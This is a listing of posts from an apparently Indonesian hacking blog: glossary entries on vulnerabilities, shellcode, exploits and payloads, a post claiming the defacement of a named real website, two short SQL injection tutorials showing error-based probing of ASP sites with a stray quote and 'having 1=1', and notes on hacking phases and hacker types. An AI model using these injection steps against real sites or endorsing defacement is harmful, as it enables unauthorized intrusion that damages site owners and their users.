It's About Xadpritox
Tentang Vulnerability
Dec 26th
Dalam system security komputer, istilah Vulnerability merupakan suatu kelemahan yang memungkinkan seseorang untuk masuk dan mendapatkan hak akses kedalam komputer yang dituju(target). Biasanya vulnerability adalah kelemahan yang dikarenakan kesalahan setting ataupun ataupun ketidaktahuan administrator.
Tentang Shellcode
Dec 26th
Shellcode adalah kode yang digunakan dengan payload untuk mengeksploitasi komputer target. Biasanya shellcode dibuat untuk dapat mengontrol komputer, ataupun mendapatkan hak akses komputer target, atau yang lainnya. Shellcode dimasukkan kedalam kode exploit dengan tujuan membaypass fungsi suatu software, sehingga software tersebut tidak berjalan secara semestinya, melainkan menjalankan fungsi pada Shellcode.
Tentang Exploit
Dec 26th
Exploit adalah sebuah kode yang menyerang keamanan komputer secara spesifik. Exploit banyak digunakan untuk penentrasi baik secara legal ataupun ilegal untuk mencari kelemahan pada komputer tujuan. Biasanya exploit mencari kelemahan dari variabel null ataupun variabel yang tidak terdefinisi untuk dimasukkan nilai lain sehingga terjadi error dan tidak membaca prosedur program seperti seharusnya, sehingga shellcode dapat dimasukkan untuk melaksanakan perintah atau command lainnya.
Tentang Payload
Dec 26th
Payload dalam dunia security yaitu pembawa exploit yang digunakan untuk mengeksekusi shellcode. Payload kemudian akan menjalankan shellcode yang dipilih pada target komputer untuk mendapatkan akses kedalam komputer tujuan (target).
Deface PornCrack[dot]com
Dec 3rd
Untuk Bangsa Indonesia, dan untuk mengurangi keterpurukan mental remaja, This Deface is For Indonesia. Link di www[dot]porncrack[dot]com
SQL Injection Pada ASP 2
Nov 23rd
Kali ini saya akan memberikan contoh SQL Injection menggunakan metode Union Select, berikut contohnya :
Misalkan target kita kali ini adalah
http://[target]/Product_Des.asp?ProductID=55
Lalu kita tambahkan kutip 1 (‘) pada bagian belakang addressnya, menjadi http://[target]/Product_Des.asp?ProductID=55′
Jika terdapat Error, misalkan errornya seperti berikut :
Microsoft OLE DB Provider for SQL Server error ‘80040e14′
Unclosed quotation mark before the character string ”.
/Product_Des.asp, line 11
SQL Injection Pada ASP 1
Nov 23rd
Saya akan menunjukkan sql injection yang ditemukan oleh david Litcfield. berikut contohnya :
misal alamat target adalah http://[target.com]/Products.asp?CategoryId=55
lalu kita kasih tanda kutip satu, di belakang. jadi alamat webnya adalah
http://[target.com]/Products.asp?CategoryId=55′
Microsoft OLE DB Provider for SQL Server error ‘80040e14′
Unclosed quotation mark before the character string ”.
/Product_Des.asp, line 11
tuh, kan keliatan errornya tuh. he he he…
nah, sekarang tinggal cari tablenya, pake metode dari david Litcfield ini, caranya adalah dengan menambahkan having 1=1
berikut contohnya :
http://[target.com]/Products.asp?CategoryId=55+having+1=1
nah, kan keliatan errornya tuh, errornya begini
Microsoft OLE DB Provider for SQL Server error ‘80040e14′
Column ‘ProductTbl.ProductImage’ is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/Product_Des.asp, line 11
Tahapan Hacking
Nov 22nd
Berikut adalah Tahapan tahapan untuk melakukan Hacking, yaitu :
1. Reconnaissance
Yaitu tahap seorang Hacker dalam mengumpulkan data sebanyak banyaknya tentang Target/Sasaran. Data apa saja yang diperlukan, baik dari tanggal lahir, nomor rumah, nama istri atau suami atau anak, hobi, plat kendaraan, dll.
Reconnaissance dibagi menjadi 2, yaitu Active Reconnaissance dan Passive Reconnaissance. Active Reconnaissance adalah pengumpulan data dengan cara bertatap muka langsung atau berhubungan langsung dengan Target/Sasaran, sedangkan Passive Reconnaissance adalah menggunakan media informasi seperti berita, internet, dll.
Tipe Hacker Berdasarkan Tindakannya
Nov 22nd
Hacker berdasarkan tindakannya dibedakan menjadi 3 jenis yaitu :
1. Black Hat Hacker
Yaitu Hacker yang menggunakan kemampuan dan kepandaiannya untuk perbuatan perbuatan jahat dan merusak. Hacker tipe ini biasanya disebut Cracker. Hacker hacker tipe ini biasanya adalah orang iseng yang hanya ingin menjajal kemampuannya, dan ingin mencari ketenaran belaka. Namun tidak menutup kemungkinan, hacker tipe ini adalah hacker bayaran yang memang spesialis untuk merusak sebuah system/komputer atau website orang lain.